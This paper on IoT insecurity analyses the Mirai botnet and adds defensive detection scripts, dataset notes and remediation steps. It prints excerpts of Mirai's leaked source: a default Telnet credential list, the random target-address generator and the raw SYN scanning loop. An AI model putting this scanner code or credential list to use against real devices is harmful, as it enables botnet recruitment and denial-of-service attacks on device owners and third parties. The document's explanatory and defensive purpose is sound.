Internet of Insecure Things

Abstract

The Internet of Things (IoT) has become an industry buzzword; in the simplest terms it refers to the integration of everyday devices (or "things") with the internet. Cars, light bulbs, health monitors, refrigerators and other kitchen appliances, smoke and fire alarms, alarm clocks and more are going "smart" as they connect to the internet, and the list grows as the IoT industry grows. These devices collect data, and the internet ecosystem is used to store and process it. Although the introduction of IoT has transformed the way humans interact with devices, it has arguably done more harm than good. The internet was created decades before IoT existed and was not designed to support it seamlessly; devices (hardware), for their part, were manufactured in isolation and were not designed for internet connectivity either. This sudden and immense surge in connecting devices to the internet has introduced serious concerns about the privacy and security of data: a flaw in the device or its firmware, in the internet backend, or in the data transmission path can compromise both. Beyond preventive steps, there is a need to understand botnet source code in order to make devices more secure, and to apply machine learning to identify infected devices effectively.

Goal of Presentation

Through this paper we unveil some of the reasons for, and the types of, security concerns associated with the Internet of Things, along with recommendations that manufacturers should keep in mind while building IoT-enabled devices and designing IoT interfaces.

Introduction

Numerous IoT devices are on the market, and they are transforming how humans interact with devices and gadgets. Estimated at 10 billion today, the number of IoT devices is expected to triple by 2020 according to a BI Intelligence report. The most hyped IoT device is the Amazon Echo, a smart-home speaker driven by the voice assistant Alexa, which users talk to for weather updates, recipes, music, the time, cab bookings and more. Wearables such as Fitbit devices track the user's health and fitness activity, and GPS tracker bands track the user's location. Radio-frequency identification (RFID) tags are used extensively in vehicle parking systems in offices, malls and buildings. All these systems collect large amounts of data and transmit it over the internet to backend systems for processing and analytics. Although these devices make our lives easier, they raise safety and security issues because of the kind of data they transmit: the Amazon Echo holds a great deal of personal data from users' daily interactions with the voice assistant; Fitbit holds data about a person's health, sleep patterns and workout schedule; GPS trackers record the exact coordinates of the user's whereabouts and how far they are from home. If such data falls into an attacker's hands it can be exploited: a criminal can plan a robbery by learning a user's sleep patterns or GPS location, and phishing attacks can be tailored using personal data. These challenges around security, privacy and user safety make IoT technology insecure and limit the growth of its true potential.

Objectives

Security Concerns

  • Default/hardcoded credentials – IoT devices are manufactured much like non-IoT devices. Little is invested in the firmware, so it ships with default or hardcoded credentials that it uses to operate and to connect to the backend.
  • Software lifecycle not followed – Because of conventional manufacturing, cost reduction and pressure for early time to market, a Software Development Life Cycle (SDLC) with security built in is not followed while building firmware for IoT devices. This leaves several development loopholes that can be exploited, the biggest being unsafe human-machine interfaces (HMI).
  • Firmware vulnerabilities – Firmware in an IoT device may carry vulnerabilities and malware. Firmware typically performs weak input validation and can be compromised easily. Weak validation on firmware interfaces leads to issues such as SQL injection, cross-site scripting, and exposure of privileged functions over USB and other debug interfaces.
  • Universal Plug and Play (UPnP) – Attackers need a way to reach IoT devices, and the easiest is through vulnerabilities in home routers. UPnP does not require any authentication from the user: any application running on a computer on the LAN can ask the router to forward a port over UPnP, which is why malware can abuse UPnP to expose devices directly to the internet.
  • Heartbleed bug – Heartbleed is a serious vulnerability in the popular OpenSSL cryptographic library. It lets an attacker read memory from an affected server or client and thereby steal information that would normally be protected by the SSL/TLS encryption used to secure the internet. SSL/TLS provides communication security and privacy for applications such as the web, email, instant messaging (IM) and some virtual private networks (VPNs).

According to a Shodan report [4], around 130,000 devices in the top 10 countries alone are still vulnerable to Heartbleed.

DDoS Attack demystified

  • Mirai botnet – Distributed Denial of Service – One of the most dreaded attacks in IoT history, the Mirai botnet, was made possible by default credentials. Mirai infected hundreds of thousands of internet-exposed devices such as IP cameras, DVRs and home routers that were remotely accessible with easily guessable default credentials, and used this bot network to flood targets with superfluous requests. Its October 2016 attack on the DNS provider Dyn disrupted major websites for users across North America and Europe. A later Mirai variant spread through TCP port 7547, the port ISPs typically use to remotely manage customer routers (TR-069/TR-064) during outages and configuration changes, and knocked nearly a million Deutsche Telekom customers offline in November 2016.

The original Mirai spread by brute force: it attempted Telnet logins with a list of 62 default username/password combinations, and since the devices imposed no cap on the number of attempts, every device with default or weak credentials fell prey to it.

The following snippets are taken from the Mirai source code mirrored on GitHub by user jgamblin [5].

A sample of the default credential list (username / password):

    Username    Password
    root        xc3511
    root        vizxv
    root        admin
    admin       admin
    root        888888

Target IP addresses are generated at random by the function below. The loop keeps drawing random addresses until one falls outside the excluded ranges: loopback, private and other reserved space, multicast, and, notably, address blocks belonging to the US Department of Defense, the US Postal Service and two private companies, General Electric and Hewlett-Packard. These are not "secure" addresses; they are ranges that cannot host victims, or that the authors wanted to avoid probing because the owners were likely to notice.

/* From bot/scanner.c. The supporting definitions (from Mirai's includes.h and
   rand.c) are summarised here so the function reads stand-alone. */
#include <stdint.h>
#include <arpa/inet.h>

typedef uint32_t ipv4_t;
/* Pack four octets into a network-byte-order address. */
#define INET_ADDR(o1,o2,o3,o4) (htonl((o1 << 24) | (o2 << 16) | (o3 << 8) | (o4 << 0)))
uint32_t rand_next(void);   /* xorshift PRNG from rand.c */

static ipv4_t get_random_ip(void)
{
    uint32_t tmp;
    uint8_t o1, o2, o3, o4;

    do
    {
        tmp = rand_next();

        /* Split the 32-bit random value into four octets. */
        o1 = tmp & 0xff;
        o2 = (tmp >> 8) & 0xff;
        o3 = (tmp >> 16) & 0xff;
        o4 = (tmp >> 24) & 0xff;
    }
    while (o1 == 127 ||                              // 127.0.0.0/8    - Loopback
          (o1 == 0) ||                               // 0.0.0.0/8      - Invalid address space
          (o1 == 3) ||                               // 3.0.0.0/8      - General Electric Company
          (o1 == 15 || o1 == 16) ||                  // 15.0.0.0/7     - Hewlett-Packard Company
          (o1 == 56) ||                              // 56.0.0.0/8     - US Postal Service
          (o1 == 10) ||                              // 10.0.0.0/8     - Internal network
          (o1 == 192 && o2 == 168) ||                // 192.168.0.0/16 - Internal network
          (o1 == 172 && o2 >= 16 && o2 < 32) ||      // 172.16.0.0/12  - Internal network (upstream comment says /14)
          (o1 == 100 && o2 >= 64 && o2 < 127) ||     // 100.64.0.0/10  - IANA NAT reserved
          (o1 == 169 && o2 > 254) ||                 // 169.254.0.0/16 - intended; upstream bug: o2 > 254 only matches 169.255.x.x
          (o1 == 198 && o2 >= 18 && o2 < 20) ||      // 198.18.0.0/15  - IANA Special use
          (o1 >= 224) ||                             // 224.*.*.*+     - Multicast
          (o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 ||
           o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense
    );

    return INET_ADDR(o1, o2, o3, o4);
}

Command and Control (CNC)

The command and control (CNC) server is the component that manages the botnet. It is written in Go and defines the administrative interface and the attack commands that are dispatched to every device ("bot") under its control.

The scanner shown below, by contrast, is part of the bot itself (bot/scanner.c, written in C) and runs on every infected device. It finds new victims by spraying raw TCP SYN probes at random addresses on port 23 (every tenth probe goes to 2323), then hands any host that answers with a SYN-ACK to the Telnet brute-force logic. Mirai keeps no per-probe state: it writes the destination address into the SYN's sequence number, so a reply is recognised by checking that ack_seq - 1 equals the address of the replying host.

// Main logic loop
while (TRUE)
{
    ……….

    // Spew out SYN to try and get a response
    if (fake_time != last_spew)
    {
        last_spew = fake_time;

        for (i = 0; i < SCANNER_RAW_PPS; i++)
        {
            struct sockaddr_in paddr = {0};
            struct iphdr *iph = (struct iphdr *)scanner_rawpkt;
            struct tcphdr *tcph = (struct tcphdr *)(iph + 1);

            // Pick a fresh random target and recompute the IP checksum
            iph->id = rand_next();
            iph->saddr = LOCAL_ADDR;
            iph->daddr = get_random_ip();
            iph->check = 0;
            iph->check = checksum_generic((uint16_t *)iph, sizeof (struct iphdr));

            // Nine probes out of ten go to 23/tcp, the tenth to 2323/tcp
            if (i % 10 == 0)
            {
                tcph->dest = htons(2323);
            }
            else
            {
                tcph->dest = htons(23);
            }

            …………………   // (elided in this excerpt; the original sets tcph->seq = iph->daddr here)

            sendto(rsck, scanner_rawpkt, sizeof (scanner_rawpkt), MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof (paddr));
        }
    }

    ……………….

    // Filter replies read from the raw socket: keep only SYN-ACKs from 23/2323 addressed to us
    if (n < sizeof(struct iphdr) + sizeof(struct tcphdr))
        continue;
    if (iph->daddr != LOCAL_ADDR)
        continue;
    if (iph->protocol != IPPROTO_TCP)
        continue;
    if (tcph->source != htons(23) && tcph->source != htons(2323))
        continue;
    if (tcph->dest != source_port)
        continue;
    if (!tcph->syn)
        continue;
    if (!tcph->ack)
        continue;
    if (tcph->rst)
        continue;
    if (tcph->fin)
        continue;
    // Stateless match: the probe's seq was the target address, so ack_seq - 1 must equal the replier
    if (htonl(ntohl(tcph->ack_seq) - 1) != iph->saddr)
        continue;

    // Find a free connection slot for the Telnet brute-force stage
    conn = NULL;
    for (n = last_avail_conn; n < SCANNER_MAX_CONNS; n++)
    {
        if (conn_table[n].state == SC_CLOSED)
        {
            conn = &conn_table[n];
            last_avail_conn = n;
            break;
        }
    }

    // If there were no slots, then no point reading any more
    if (conn == NULL)
        break;

    conn->dst_addr = iph->saddr;
    conn->dst_port = tcph->source;
    setup_connection(conn);
    // (debug logging under #ifdef DEBUG elided)
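A defender can turn the sequence-number trick into a detection signature. The following Python script is an added example, not code from the Mirai source or from this paper. It runs over a constructed list of SYN records (source, destination, destination port, TCP flags, raw 32-bit sequence number; the fields any flow exporter or packet capture provides) and flags sources whose SYNs to 23/2323 carry a sequence number equal to the destination address, reporting the 9:1 split between ports 23 and 2323 that the loop above produces. The record layout and the sample values are assumptions made for the example.

```python
"""Flag Mirai-style Telnet scans from SYN records (added example; constructed data)."""
import ipaddress
from collections import defaultdict

# Ports probed by the scanner loop above: 23/tcp, and 2323/tcp for every tenth probe.
MIRAI_PORTS = {23, 2323}


def build_sample_records():
    """Constructed SYN records, not captured traffic.

    Each record is (src, dst, dport, tcp_flags, seq) with seq the raw 32-bit
    sequence number decoded big-endian, as a packet capture would show it.
    """
    scanner = "203.0.113.7"
    recs = []
    for i in range(10):
        dst = f"198.51.100.{20 + i}"
        dport = 2323 if i % 10 == 0 else 23          # mirrors `if (i % 10 == 0)`
        recs.append((scanner, dst, dport, "S", int(ipaddress.ip_address(dst))))
    # A legitimate admin opening one Telnet session: kernel-chosen random ISN.
    recs.append(("192.0.2.10", "198.51.100.5", 23, "S", 0x1F2E3D4C))
    # A SYN-ACK reply travelling back to the scanner: not a probe.
    recs.append(("198.51.100.21", scanner, 23, "SA", 0x0A0B0C0D))
    # Same seq trick on a non-Telnet port: outside this signature.
    recs.append(("203.0.113.9", "198.51.100.40", 80, "S",
                 int(ipaddress.ip_address("198.51.100.40"))))
    return recs


def is_mirai_probe(rec):
    """True when a pure SYN to 23/2323 carries seq == destination address.

    Mirai sets tcph->seq = iph->daddr; both are 32-bit network-order values,
    so the sequence field on the wire is byte-for-byte the destination IP.
    """
    src, dst, dport, flags, seq = rec
    if flags != "S" or dport not in MIRAI_PORTS:
        return False
    return seq == int(ipaddress.ip_address(dst))


def summarize_scanners(records, min_probes=3):
    """Aggregate fingerprinted SYNs per source; report sources at or above min_probes."""
    per_src = defaultdict(lambda: {"probes": 0, "targets": set(), "p23": 0, "p2323": 0})
    for rec in records:
        if not is_mirai_probe(rec):
            continue
        src, dst, dport = rec[0], rec[1], rec[2]
        s = per_src[src]
        s["probes"] += 1
        s["targets"].add(dst)
        s["p2323" if dport == 2323 else "p23"] += 1
    report = [
        {"src": src, "probes": s["probes"], "targets": len(s["targets"]),
         "p23": s["p23"], "p2323": s["p2323"]}
        for src, s in per_src.items() if s["probes"] >= min_probes
    ]
    return sorted(report, key=lambda r: -r["probes"])


if __name__ == "__main__":
    for hit in summarize_scanners(build_sample_records()):
        print(f"{hit['src']}: {hit['probes']} fingerprinted SYNs to {hit['targets']} hosts "
              f"(23/tcp: {hit['p23']}, 2323/tcp: {hit['p2323']})")
```

A benign host choosing a random initial sequence number that happens to equal the destination address is a one-in-2^32 event per SYN, so a handful of matches from one source is conclusive. The caveat is coverage: the signature identifies the leaked scanner and close derivatives; variants that randomise the sequence number will not match and still need the rate-based view that the per-source target count provides.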

Using Recurrent Neural Networks to Identify Bots in attacks

Mirai's attack module can launch HTTP floods as well as various network-level (OSI layer 3-4) DDoS attacks. During HTTP floods, Mirai bots hide behind the following default user-agent strings:

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/60

On their own these user-agents are indistinguishable from ordinary browsers, but there are traffic patterns that ML algorithms, including Recurrent Neural Networks (RNNs), can learn in order to identify infected bots.

DDoS Datasets

[7] Computer Network Traffic Data – A ~500 KB CSV summarising real network traffic from the past. The dataset has ~21K rows and covers 10 local workstation IPs over a three-month period. Half of these local IPs were compromised at some point during this period and became members of various botnets. Each row consists of four columns:

  1. date: yyyy-mm-dd (from 2006-07-01 through 2006-09-30)
  2. l_ipn: local IP (coded as an integer from 0-9)
  3. r_asn: remote ASN (an integer which identifies the remote ISP)
  4. f: flows (count of connections for that day)

Reports of "odd" activity or suspicions about a machine's behaviour triggered investigations on the following days (although the machine might have been compromised earlier). These dates supply the ground-truth labels for supervised learning: a local IP is treated as compromised from its investigation date onward.

    Date     Local IP(s)
    08-24    1
    09-04    5
    09-18    4
    09-26    3, 6

These patterns lend themselves to an RNN because every botnet infection unfolds as a sequence: the per-day flow counts and the set of remote ASNs each local IP talks to, ordered in time, can be used directly as features.
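To show how the dataset described above becomes RNN input, the following Python code is an added example; it is not part of the paper or of the dataset's documentation. It parses a constructed handful of rows in the dataset's four-column format, aggregates per local IP and day into (total flows, distinct remote ASNs), labels each day from the investigation table above (the year 2006 is taken from the date range; treating a host as compromised from the report date onward is an assumption), cuts fixed-length windows that a recurrent model could consume, and, as a model-free baseline, flags days on which the count of distinct remote networks surges. In the sample the surge appears on 08-23, a day before the 08-24 investigation, which illustrates the dataset's own caveat that compromise may predate the report.

```python
"""Turn the daily flow dataset into labelled sequences for an RNN (added example)."""
import csv
import io
from collections import defaultdict
from datetime import date

# Constructed rows in the dataset's format (date,l_ipn,r_asn,f); not real data.
# Local IP 1 talks to two remote ASNs until 08-23, when it suddenly contacts four
# new networks with high flow counts; local IP 0 is quiet throughout.
SAMPLE_CSV = """date,l_ipn,r_asn,f
2006-08-20,1,7018,40
2006-08-20,1,3356,35
2006-08-21,1,7018,42
2006-08-21,1,3356,33
2006-08-22,1,7018,38
2006-08-22,1,3356,37
2006-08-23,1,7018,41
2006-08-23,1,3356,30
2006-08-23,1,9121,120
2006-08-23,1,4134,95
2006-08-23,1,4837,88
2006-08-23,1,3462,101
2006-08-24,1,9121,160
2006-08-24,1,4134,140
2006-08-24,1,4837,155
2006-08-24,1,3462,150
2006-08-24,1,7018,39
2006-08-20,0,7018,20
2006-08-21,0,7018,21
2006-08-22,0,7018,19
2006-08-23,0,7018,22
2006-08-24,0,7018,20
"""

# Investigation dates from the dataset description (year 2006 from its date range).
INVESTIGATED = {1: date(2006, 8, 24), 5: date(2006, 9, 4), 4: date(2006, 9, 18),
                3: date(2006, 9, 26), 6: date(2006, 9, 26)}


def daily_features(csv_text):
    """Return {local_ip: [(day, total_flows, distinct_remote_asns), ...]} sorted by day."""
    acc = defaultdict(lambda: defaultdict(lambda: [0, set()]))
    for row in csv.DictReader(io.StringIO(csv_text)):
        day = date.fromisoformat(row["date"])
        cell = acc[int(row["l_ipn"])][day]
        cell[0] += int(row["f"])
        cell[1].add(int(row["r_asn"]))
    return {ip: [(day, flows, len(asns)) for day, (flows, asns) in sorted(days.items())]
            for ip, days in acc.items()}


def label(local_ip, day):
    """1 from the investigation date onward, else 0.

    Assumption: the report date marks the start of the compromised period; the
    dataset warns the machine may have been compromised earlier.
    """
    reported = INVESTIGATED.get(local_ip)
    return 1 if reported is not None and day >= reported else 0


def make_sequences(features, window=3):
    """Fixed-length windows of [flows, distinct_asns] per day, labelled by the last day.

    X is (samples, window, 2) as nested lists, the shape an RNN layer expects.
    """
    X, y = [], []
    for ip, days in features.items():
        for end in range(window, len(days) + 1):
            win = days[end - window:end]
            X.append([[flows, asns] for _, flows, asns in win])
            y.append(label(ip, win[-1][0]))
    return X, y


def flag_asn_surge(features, factor=2.5):
    """Model-free baseline: flag a day whose distinct-ASN count exceeds `factor` times
    the mean of all earlier days for that host. A bot that scans or contacts new C2
    infrastructure reaches many networks it never spoke to before."""
    flagged = []
    for ip, days in features.items():
        for i in range(1, len(days)):
            history = [asns for _, _, asns in days[:i]]
            if days[i][2] > factor * (sum(history) / len(history)):
                flagged.append((ip, days[i][0]))
    return flagged


if __name__ == "__main__":
    feats = daily_features(SAMPLE_CSV)
    X, y = make_sequences(feats)
    print(f"{len(X)} sequences, {sum(y)} labelled compromised")
    for ip, day in flag_asn_surge(feats):
        print(f"local IP {ip}: distinct-ASN surge on {day} (reported {INVESTIGATED.get(ip)})")
```

The windows and labels are what a recurrent model is trained on; the baseline exists to sanity-check that the features carry signal before any model is fitted. Because the labels start at the report date, windows that end on the days just before it are labelled clean even when, as here, the traffic is already anomalous; a practitioner should expect some label noise on exactly those days.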

[8] Intrusion detection evaluation dataset: real traces were analysed to create profiles for agents that generate realistic traffic for HTTP, SMTP, SSH, IMAP, POP3 and FTP. A set of guidelines was established to define what constitutes a valid dataset, and these guidelines form the basis for generating the profiles.

  • Feature Extraction

[8] Characterization of Tor Traffic using Time based Features: CICFlowMeter generates bidirectional flows, where the first packet determines the forward (source to destination) and backward (destination to source) directions; statistical features such as duration, number of packets, number of bytes and packet length are therefore calculated separately for each direction, giving more than 80 features per flow. The output is a CSV file in which each flow is identified by six columns, FlowID, SourceIP, DestinationIP, SourcePort, DestinationPort and Protocol, followed by the 80+ network traffic features. Note that TCP flows are usually terminated on connection teardown (by a FIN packet), while UDP flows are terminated by a flow timeout. The flow timeout can be set arbitrarily by the individual scheme, e.g. 600 seconds for both TCP and UDP.

Recommendations

[3] To remove the Mirai malware from an infected IoT device, users and administrators should take the following actions:

  • Disconnect the device from the network.
  • While disconnected from the network and the internet, reboot the device. Because Mirai exists only in dynamic memory, rebooting clears the malware [6].
  • Ensure that the password for accessing the device has been changed from the default to a strong password. See the US-CERT Tip "Choosing and Protecting Passwords" for more information.
  • Reconnect to the network only after rebooting and changing the password. If you reconnect before changing the password, the device can be quickly re-infected with Mirai, because infected devices scan the internet for default credentials continuously.

Preventive Steps

To prevent a malware infection on an IoT device, users and administrators should take the following precautions:

  • Ensure all default passwords are changed to strong passwords. Default usernames and passwords for most devices can easily be found on the internet, making devices with default passwords extremely vulnerable.
  • Update IoT devices with security patches as soon as patches become available.
  • Disable Universal Plug and Play (UPnP) on routers unless absolutely necessary. [1]
  • Consumers should be aware of the capabilities of the devices and appliances installed in their homes and businesses.
  • Monitor TCP ports 23 and 2323 for attempts to gain unauthorized control over IoT devices via the Telnet protocol. [2]
  • And more…
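Monitoring for Telnet brute force in practice means watching authentication logs rather than only the ports. The Python script below is an added example, not code from the paper or from any vendor's tooling. It assumes a simple telnetd log format (constructed sample lines are included; the regex must be adapted to a real device's syslog) and raises two kinds of alert: a brute-force alert when one source accumulates a threshold of failed logins within a sliding window, the condition Mirai relies on devices never enforcing, and a guessed-login alert when a login is accepted from a source that failed shortly before, which is the signature of a default or weak password having been found.

```python
"""Detect Telnet credential brute force and guessed logins in device logs (added example)."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed telnetd log lines in an assumed format (timestamps UTC); adapt
# LINE_RE to the syslog format your devices actually emit.
SAMPLE_LOG = """\
2016-10-21T10:00:01 cam01 telnetd: FAILED login user=root from=203.0.113.7 port=23
2016-10-21T10:00:02 cam01 telnetd: FAILED login user=root from=203.0.113.7 port=23
2016-10-21T10:00:03 cam01 telnetd: FAILED login user=admin from=203.0.113.7 port=23
2016-10-21T10:00:04 cam01 telnetd: FAILED login user=root from=203.0.113.7 port=23
2016-10-21T10:00:05 cam01 telnetd: FAILED login user=root from=203.0.113.7 port=23
2016-10-21T10:00:06 cam01 telnetd: ACCEPTED login user=root from=203.0.113.7 port=23
2016-10-21T10:30:00 cam01 telnetd: ACCEPTED login user=admin from=192.0.2.10 port=23
2016-10-21T11:00:00 cam01 telnetd: FAILED login user=root from=198.51.100.9 port=2323
2016-10-21T11:00:01 cam01 telnetd: FAILED login user=root from=198.51.100.9 port=2323
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) telnetd: (?P<result>FAILED|ACCEPTED) login "
    r"user=(?P<user>\S+) from=(?P<src>\S+) port=(?P<port>\d+)$"
)
TELNET_PORTS = {23, 2323}


def parse_line(line):
    """Parse one log line into a dict, or None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.fromisoformat(ev["ts"])
    ev["port"] = int(ev["port"])
    return ev


def detect(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return alerts as (kind, src, host, timestamp) tuples.

    brute_force:   `threshold` or more failures from one source inside `window`
                   (Mirai depends on devices imposing no such cap).
    guessed_login: a login accepted from a source that failed within `window`,
                   i.e. the dictionary found a default or weak password.
    """
    recent_failures = defaultdict(deque)   # src -> timestamps of recent failures
    alerts, already = [], set()
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None or ev["port"] not in TELNET_PORTS:
            continue
        q = recent_failures[ev["src"]]
        while q and ev["ts"] - q[0] > window:   # slide the window forward
            q.popleft()
        if ev["result"] == "FAILED":
            q.append(ev["ts"])
            key = (ev["src"], "brute_force")
            if len(q) >= threshold and key not in already:
                already.add(key)
                alerts.append(("brute_force", ev["src"], ev["host"], ev["ts"]))
        elif q:   # ACCEPTED while the same source has recent failures
            alerts.append(("guessed_login", ev["src"], ev["host"], ev["ts"]))
    return alerts


if __name__ == "__main__":
    for kind, src, host, ts in detect(SAMPLE_LOG):
        print(f"{ts.isoformat()} {host}: {kind} from {src}")
```

The rules are deliberately independent of Mirai's credential list: a device does not need to know which dictionary is in use to recognise that a single source is cycling through logins faster than any human would. A guessed_login alert is the trigger for the remediation sequence above (disconnect, reboot, change the password, then reconnect), since the device should be treated as compromised from that moment.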

Key Takeaways

  • Emphasize security from day one
  • Lifecycle, future-proofing, updates
  • Access control and device authentication
  • Know your enemy
  • Prepare for security breaches

References & Appendix

  • [1] Federal Bureau of Investigation Public Service Announcement: Internet of Things Poses Opportunities for Cyber Crime
  • [2] SANS ISC InfoSec Forums: What is happening on 2323/TCP?
  • [3] US-CERT Alert TA16-288A: Heightened DDoS Threat Posed by Mirai and Other Botnets
  • [4] Shodan: Heartbleed Report
  • [5] jgamblin, Mirai-Source-Code (GitHub mirror of the leaked Mirai source)
  • [6]
  • [7] Kaggle dataset: Computer Network Traffic Data
  • [8] Canadian Institute for Cybersecurity, University of New Brunswick: Intrusion Detection Evaluation Dataset (ISCX 2012) and Characterization of Tor Traffic using Time based Features (CICFlowMeter)

Author Biography

Tanvi Dharmarha works with Adobe Systems as a Quality Engineering Manager and has over 10 years of experience in the software industry. She has several paper publications to her credit, holds an engineering degree in Information Technology from GGS Indraprastha University, and is a certified Stanford Advanced Project Manager.

Varun Agarwal works with Adobe Systems as a Software Engineer and has over 3 years of experience. He has worked on multiple technologies and products during his tenure and has a special interest in the field of security testing.
